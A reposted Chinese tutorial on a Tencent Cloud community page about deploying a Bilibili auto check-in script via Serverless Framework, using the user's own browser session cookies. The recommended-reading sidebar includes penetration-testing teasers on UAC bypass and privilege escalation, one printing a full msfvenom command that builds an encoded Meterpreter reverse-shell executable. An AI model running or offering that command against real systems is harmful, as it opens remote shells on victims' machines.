首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >B站签到-云函数

B站签到-云函数

作者头像
诗兄不是师兄
修改于 2020-10-26 03:59:42
修改于 2020-10-26 03:59:42
4K10
代码可运行
举报
文章被收录于专栏:记录代码记录代码
运行总次数:0
代码可运行

该脚本通过 Serverless Framework 部署,可以实现自动定时打卡和邮件推送通知的功能。

脚本来自:github.com/happy888888/BiliExp

  1. 安装命令行工具 Serverless Framework
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
npm install -g serverless
  1. 下载项目模版代码,并进入模版目录 biliexp-demo
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sls init biliexp-demo
cd biliexp-demo
  1. 打开 config.json 文档,根据说明填入对应内容,cookieDatas由浏览器获取,email 处填入用于接受通知的邮件名
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
{
    "cookieDatas":[
       {
           "SESSDATA": "",
           "bili_jct": "",
           "DedeUserID": ""
       }
   ],
   "email": "" ,
}

获取 cookieDatas(以 Chrome 为例):登录 B 站 -> 右键点击「检查」-> application -> cookies

  1. 通过命令 sls deploy 完成部署,部署成功后,每日可自动触发,为您完成签到打卡

成功部署

脚本测试

登陆腾讯云云函数控制台,可以看到成功部署的函数,点击「测试」按钮检测函数运行结果,可以看到函数调用成功:

https://console.cloud.tencent.com/scf

登陆 bilibili 个人中心,可以看到打卡成功。

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
1 条评论
热度
最新
你想搞事情??
你想搞事情??
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
Bypass-UAC(用户帐户控制)的那些事
在本文中,我们将简要介绍一下用户帐户控制,即UAC。我们还将研究它如何潜在地保护免受恶意软件的攻击并忽略UAC提示可能给系统带来的一些问题。
FB客服
2021/10/11
2.2K0
学习之详细说说MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
TRY博客-简单的网络技术
2022/07/18
1.9K0
学习之详细说说MSF渗透测试
浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
FB客服
2019/08/20
1.7K0
windows提权看这一篇就够了
windows在日常的渗透中经常遇到,而在内网之前,经常会在所拿到的跳板机进行提权,这样后面横向,内网才能更好的展开(抓hash,必须得系统或管理员权限),所以这里做了一次window提权总结,建议收藏,反复看,熟能生巧!
Gamma实验室
2021/01/11
17.4K0
windows提权看这一篇就够了
Windows提权总结(超详细)
在 Windows 中实现特权升级的最终目标是获得作为管理员或系统用户运行的权限,提权的关键是需要对受破坏的系统进行大量的信息搜集。
红队蓝军
2024/07/16
1.5K0
Windows提权总结(超详细)
KALI 内网渗透记录
虚拟机 KALI: 192.168.180.128 目标机器: 192.168.1.52
院长技术
2020/08/19
2.9K0
KALI拿到shell后提权操作
介绍: 使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC 1.拿到session后将session放入后台 2.执行 use exploit windows/local/ask 使用ask模块 3.在ask模块中首先设置你的session会话的ID
院长技术
2020/08/19
1.8K0
KALI拿到shell后提权操作
渗透测试工具——Metasploit[通俗易懂]
操作机:Kali Linux 2021.1, Metasploit Frameworks 6.0.30 目标机:Windows Server 2003 sp2中文版(含ms08-067漏洞)Windows xp 英文版
全栈程序员站长
2022/09/21
6.6K0
渗透测试工具——Metasploit[通俗易懂]
kali 绕过uac提权
1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe --产生一个exe文件
用户6343818
2020/05/26
1.3K0
kali 绕过uac提权
后渗透学习二(UAC提权)
当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权
字节脉搏实验室
2020/03/08
1.4K0
后渗透学习二(UAC提权)
【操作】Cobalt Strike 中 Bypass UAC
本文只是记录下基本操作。这些操作都是我在读 Cobalt Strike 官网的 CS 4.0 手册的过程中自己无中生有凭空想出来的,所以方法可能不是很主流,有点繁琐、操作较麻烦,但是也是我自己试了完全可行的。慢慢探索更简单的道路吧、本菜鸡对自己要求不是太高,注重对自己创造力的培养。
IRTeam-工业安全
2022/05/10
1.7K0
【操作】Cobalt Strike 中 Bypass UAC
【网络安全】内网渗透(二):权限提升
网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;
sidiot
2023/08/31
6510
【网络安全】内网渗透(二):权限提升
Windows提权的几种常用姿势
当获取主机权限时,我们总是希望可以将普通用户提升为管理员用户,以便获得高权限完全控制目标主机。Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。
Bypass
2021/01/18
1.9K0
Windows提权的几种常用姿势
一文了解提权:溢出提权和第三方组件提权
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了
中龙技术
2022/09/29
1.9K0
一文了解提权:溢出提权和第三方组件提权
Windows 提权
当我们通过webshell拿到一个普通用户的权限,由于是普通用户所以很多操作都会受限制。这就需要通过一定的方法将普通用户提权到更高权限的用户。
鸿鹄实验室
2022/11/02
2.2K0
Windows 提权
MSF后渗透利用整理|MSF命令大全二
use exploit/windows/local/ms18_8120_win32k_privesc
洛米唯熊
2019/07/25
3.8K0
MSF后渗透利用整理|MSF命令大全二
网络安全红队常用的攻击方法及路径
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2023/12/21
1.2K0
网络安全红队常用的攻击方法及路径
Metasploit 生成各种后门
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。
王 瑞
2022/12/28
1.2K0
windows UAC 浅谈及绕过
随着网络攻击的日益繁多,自windows 7以及后续的windows系统中,微软引入了一种名叫UAC(User Account Control,用户账户控制)的一种安全功能,启用UAC后,在用户没有显示允许的情况下,即便是本地管理员账户也无法更改操作系统,这在很大程度上保护了我们的系统安全,以至后来我们常说的bypass UAC。
Khan安全团队
2021/03/10
7.3K0
windows UAC 浅谈及绕过
metasploit framework的一些使用姿势
Meterpreter的persistence脚本允许注入Meterpreter代理,以确保系统重启之后Meterpreter还能运行。
中龙技术
2022/09/29
1.2K0
相关推荐
Bypass-UAC(用户帐户控制)的那些事
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验